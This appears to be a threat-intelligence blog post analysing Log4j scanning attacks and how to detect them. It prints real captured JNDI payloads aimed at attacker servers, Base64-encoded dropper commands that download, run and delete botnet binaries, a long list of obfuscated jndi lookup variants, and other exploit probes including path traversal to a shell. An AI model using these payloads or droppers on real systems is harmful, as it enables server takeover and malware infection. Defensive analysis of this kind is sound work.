Log4j vulnerability hit the world. Hackers are scanning all the servers around the world everyday in search for servers infected with the Log4j vulnerabilities that would enable to them to eventually take over the servers. We took a close look at what scanning technologies that they use to find servers with Log4j vulnerabilities.

Their most primary method was sending the packet “${jndi:ldap://**.**.**:53/c}” and examining the server’s response. However, this pattern has been disclosed too much in the media and is being rapidly detected and blocked by IDS/IPS. Therefore, modified attacks as shown in the table below are being used instead. These types of variant attack packets are employing the method of splitting and transmitting payloads in the form of j}ndi,{${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p},${jndi:${lower:l}${lower:d}a${lower:p}. so that the signature in question jndi:ldap is not detected.

Log4j general attack pattern
“”t(‘${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//***.**.**.***:2420/TomcatBypass/Command/Base64/d2dldCA0Ni4xNjEuNTIuMzcvRXhwbG9pdC5zaDsgY2htb2QgK3ggRXhwbG9pdC5zaDsgLi9FeHBsb2l0LnNoOyBybSAtcmYgRXhwbG9pdC5zaA==}’)”” “”t(‘${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//***.**.**.***:2420/TomcatBypass/Command/Base64/d2dldCA0Ni4xNjEuNTIuMzcvRXhwbG9pdC5zaDsgY2htb2QgK3ggRXhwbG9pdC5zaDsgLi9FeHBsb2l0LnNoOyBybSAtcmYgRXhwbG9pdC5zaA==}’)”” 8080″
“GET /?q=%24%7Bjndi%3Aldap%3A%2F%2F45.12.32.61%3A1389%2FOS%3D%24%7Bsys%3Aos.name%7D%2FHN%3D%24%7Benv%3AHOSTNAME%7D%2Ffeb12a13-5fe3-429a-bd12-ed0c72e2ad20%7D HTTP/1.1″” 403 152 “”-“” “”${jndi:ldap://${sys:os.name}/HN=${env:HOSTNAME}/feb12a13-5fe3-429a-bd12-ed0c72e2ad20}”” 80″

Log4j attack pattern with additional encoding

Hackers are also using a method of averting attack patterns by encoding the character string part following the ldap protocol. Adding encoding enables bypassing the detection of firewalls or other types of security devices as well as bypassing detection of log analysis being collected through ESM in the security teams. The methods shown in the table below are some representative examples. It can be seen that the entire query was encoded using Base 64. If you decode and look at this encoding more closely, you can expect it to contain Linux command such as wget, bash, python, and chmod which are presumed to be used for attacks. Let’s move on to actual decoding process.

Log4j attack pattern with additional encoding
{jndi:dns://168-235-82-55.referer.scanworld.net}” “{jndi:dns://168-235-82-55.useragent.scanworld.net}

The table below shows the result of actually decoding the encoded query.

In the first case, it is shown that after downloading the potential attack script exploit.sh file from the server set up by the hackers through wget and curl, the downloaded files are allowed execution. which then runs the script that enables infection of malicious code. In particular, attackers are crafty to the point of deleting malicious bash files even after execution and in this process, backdoor, trojan horse, keyloggers are often unknowingly installed.

Moving on to the second case of ‘wget; curl-Ohttp://158.118.236/setup;’ , wget, curl are meant to be executed twice. The code is written so that curl can be executed in case wget is not installed on the server. This seems to be the script of a hacker who paid careful attention for infection to still take place regardless of various environments. Just like in the first case, it seems to be the case of changing permission to chmod 777 and editing to executable script, which leads to the infection of the file in question upon execution.

In the third attack case, patterns such as cd/tmp|| cd/var/run|| cd/mnt|| cd/root|| cd/; are seen, which is well known to be frequently used in botnet attacks.  After analyzing the bin.sh file, it turns out to be a foothold for executing the same botnet malicious code. Recently, a Mozi botnet alert has been issued, which is known to be closely related to this type of attack.

1/TomcatBypass/Command/Base64/d2dldCA0Ni4xNjEuNTIuMzcvRXhwbG9pdC5zaDsgY2htb2QgK3ggRXhwbG9pdC5zaDsgLi9FeHBsb2l0LnNoOyBybSAtcmYgRXhwbG9pdC5zaA==}')wget **.***.**.**/Exploit.sh; chmod +x Exploit.sh; ./Exploit.sh; rm -rf Exploit.sh
2TomcatBypass/Command/Base64/d2dldCBodHRwOi8vMTU4LjEwMS4xMTguMjM2L3NldHVwOyBjdXJsIC1PIGh0dHA6Ly8xNTguMTAxLjExOC4yMzYvc2V0dXA7IGNobW9kIDc3NyBzZXR1cDsgLi9zZXR1cCBleHBsb2l0}')wget; curl -O; chmod 777 setup; ./setup exploit
3/TomcatBypass/Command/Base64/Y2QgL3RtcCB8fCBjZCAvdmFyL3J1biB8fCBjZCAvbW50IHx8IGNkIC9yb290IHx8IGNkIC87IGN1cmwgaHR0cDovLzE5Mi45NS41MC4yMjgvYmlucy5zaCAtbyBiaW5zLnNoOyB3Z2V0IGh0dHA6Ly8xOTIuOTUuNTAuMjI4L2JpbnMuc2g7IGNobW9kIDc3NyBiaW5zLnNoOyBzaCBiaW5zLnNoOyBybSAtcmYgYmlucy5zaDsgaGlzdG9yeSAtYyA=}')"cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; curl -o bins.sh; wget; chmod 777 bins.sh; sh bins.sh; rm -rf bins.sh; history -c
4TomcatBypass/Command/Base64/Y2QgL3RtcCB8fCBjZCAvdmFyL3J1biB8fCBjZCAvbW50IHx8IGNkIC9yb290IHx8IGNkIC87IGN1cmwgaHR0cDovLzEzNS4xNDguOTEuMTQ2L2JpbnMuc2ggLW8gYmlucy5zaDsgd2dldCBodHRwOi8vMTM1LjE0OC45MS4xNDYvYmlucy5zaDsgY2htb2QgNzc3IGJpbnMuc2g7IHNoIGJpbnMuc2g7IHJtIC1yZiBiaW5zLnNoOyBoaXN0b3J5IC1j}')cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; curl -o bins.sh; wget; chmod 777 bins.sh; sh bins.sh; rm -rf bins.sh; history -c
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget; curl -O; cat db0fa4b8db0333367e9bda3ab68b8042.x86 > Exploit; chmod +x *; ./Exploit log4j2
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget; curl -O; cat db0fa4b8db0333367e9bda3ab68b8042.mips > Exploit; chmod +x *; ./Exploit log4j2
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget; curl -O; cat db0fa4b8db0333367e9bda3ab68b8042.mpsl > Exploit; chmod +x *; ./Exploit log4j2
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; vi curl -O; cat db0fa4b8db0333367e9bda3ab68b8042.arm > Exploit; chmod +x *; ./Exploit log4j2
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget; curl -O; cat db0fa4b8db0333367e9bda3ab68b8042.arm5 > Exploit; chmod +x *; ./Exploit log4j2
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget; curl -O; cat db0fa4b8db0333367e9bda3ab68b8042.arm6 > Exploit; chmod +x *; ./Exploit log4j2
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget; curl -O; cat db0fa4b8db0333367e9bda3ab68b8042.arm7 > Exploit; chmod +x *; ./Exploit log4j2
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget; curl -O; cat db0fa4b8db0333367e9bda3ab68b8042.ppc > Exploit; chmod +x *; ./Exploit log4j2
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget; curl -O; cat db0fa4b8db0333367e9bda3ab68b8042.m68k > Exploit; chmod +x *; ./Exploit log4j2
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget; curl -O; cat db0fa4b8db0333367e9bda3ab68b8042.spc > Exploit; chmod +x *; ./Exploit log4j2
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget; curl -O; cat db0fa4b8db0333367e9bda3ab68b8042.i686 > Exploit; chmod +x *; ./Exploit log4j2
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget; curl -O; cat db0fa4b8db0333367e9bda3ab68b8042.sh4 > Exploit; chmod +x *; ./Exploit log4j2
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget; curl -O; cat db0fa4b8db0333367e9bda3ab68b8042.arc > Exploit; chmod +x *; ./Exploit log4j2
Exploit.sh File 

Response Method – Signature Detection Variations

First of all, the defense method in the IPS/IDS/WAF stage requires a response that is in accordance with how hackers mobilize irregular methods to avert the rules. There is no need to register that painstakingly by looking at the attack keywords below. That also does not mean that regular expressions are needed as much. What they have in common is the format of ‘jndi:ldap://hacker-server/Query’. In general, it is reasonably expected that ‘jndi’ and ‘ldap’ must have been registered for the detection of Log4j. In addition to this, the attacks can be detected through corresponding keywords such as ‘${:’, ‘rmi’, and ‘${lower:’. 

${jndi:ldap://domain.com/j} ${jndi:ldap:/domain.com/a} ${jndi:dns:/domain.com} ${jndi:dns://domain.com/j} ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://domain.com/j} ${${::-j}ndi:rmi://domain.com/j} ${jndi:rmi://domainldap.com/j} ${${lower:jndi}:${lower:rmi}://domain.com/j} ${${lower:${lower:jndi}}:${lower:rmi}://domain.com/j} ${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://domain.com/j} ${${lower:j}${lower:n}${lower:d}i:${lower:ldap}://domain.com/j} ${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://domain.com/j} ${jndi:${lower:l}${lower:d}a${lower:p}://domain.com} ${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//domain.com/a} ${jn${env::-}di:ldap://domain.com/j} ${jn${date:}di${date:’:’}ldap://domain.com/j} ${j${k8s:k5:-ND}i${sd:k5:-:}ldap://domain.com/j} ${j${main:\k5:-Nd}i${spring:k5:-:}ldap://domain.com/j} ${j${sys:k5:-nD}${lower:i${web:k5:-:}}ldap://domain.com/j} ${j${::-nD}i${::-:}ldap://domain.com/j} ${j${EnV:K5:-nD}i:ldap://domain.com/j} ${j${loWer:Nd}i${uPper::}ldap://domain.com/j} ${jndi:ldap://} ${jnd${upper:ı}:ldap://domain.com/j} ${jnd${sys:SYS_NAME:-i}:ldap:/domain.com/j} ${j${${:-l}${:-o}${:-w}${:-e}${:-r}:n}di:ldap://domain.com/j} ${${date:’j’}${date:’n’}${date:’d’}${date:’i’}:${date:’l’}${date:’d’}${date:’a’}${date:’p’}://domain.com/j} ${${what:ever:-j}${some:thing:-n}${other:thing:-d}${and:last:-i}:ldap://domain.com/j} ${\u006a\u006e\u0064\u0069:ldap://domain.com/j} ${jn${lower:d}i:l${lower:d}ap://${lower:x}${lower:f}.domain.com/j} ${j${k8s:k5:-ND}${sd:k5:-${123%25ff:-${123%25ff:-${upper:ı}:}}}ldap://domain.com/j} %24%7Bjndi:ldap://domain.com/j%7D %24%7Bjn$%7Benv::-%7Ddi:ldap://domain.com/j%7D

Response Method- Verification of downloaded IP addresses

Additionally, the url or IP address included in the query are verified using the IP Intelligence system. To illustrate, after checking with Criminal IP, in the query below has a security vulnerability along with a history of being registered in the honeypot and included in the Snort Signature, all of which are calculated as a single score and diagnosed as Critical IP.; cat db0fa4b8db0333367e9bda3ab68b8042.arm6 > Exploit; chmod +x *; ./Exploit log4j2

The attacks detected along with Log4j

As a side note, the attack packet below is one of the many found with Log4j scanning. Hackers do not simply proceed with one attack. Ever since the Log4j issue broke out, it is necessary to take one step further to monitor other logs of the IP through which Log4j attacks were initiated instead of only defending against Log4j alone. Through the web logs collected, it was found that massive scan attack and remote code execution attack were implemented prior to the Log4j attack. Therefore, it is important to update security patch not only for attacks at issue but also for already existing or neglected ones all throughout the entire process.

POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1 GET /solr/admin/info/system?wt=json GET /securityRealm/user/admin/search/index?q=a HTTP/1.1 GET /index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 HTTP/1.1″ GET /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> HTTP/1.1 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1 GET /console/ POST /Autodiscover/Autodiscover.xml HTTP/1.1 POST /_ignition/execute-solution HTTP/1.1 POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1 <- cat/etc/passwd “POST /api/v1 HTTP/1.1
The attack packets detected along with Log4j

Note 1) log4shell – Quick Guide , https://musana.net/2021/12/13/log4shell-Quick-Guide

This article was written by drawing on data provided by Criminal IP. If you are keen to find out more about specific Criminal IP services as well as beta tester recruitment, feel free to head over to our LANDING PAGE that is NOW open!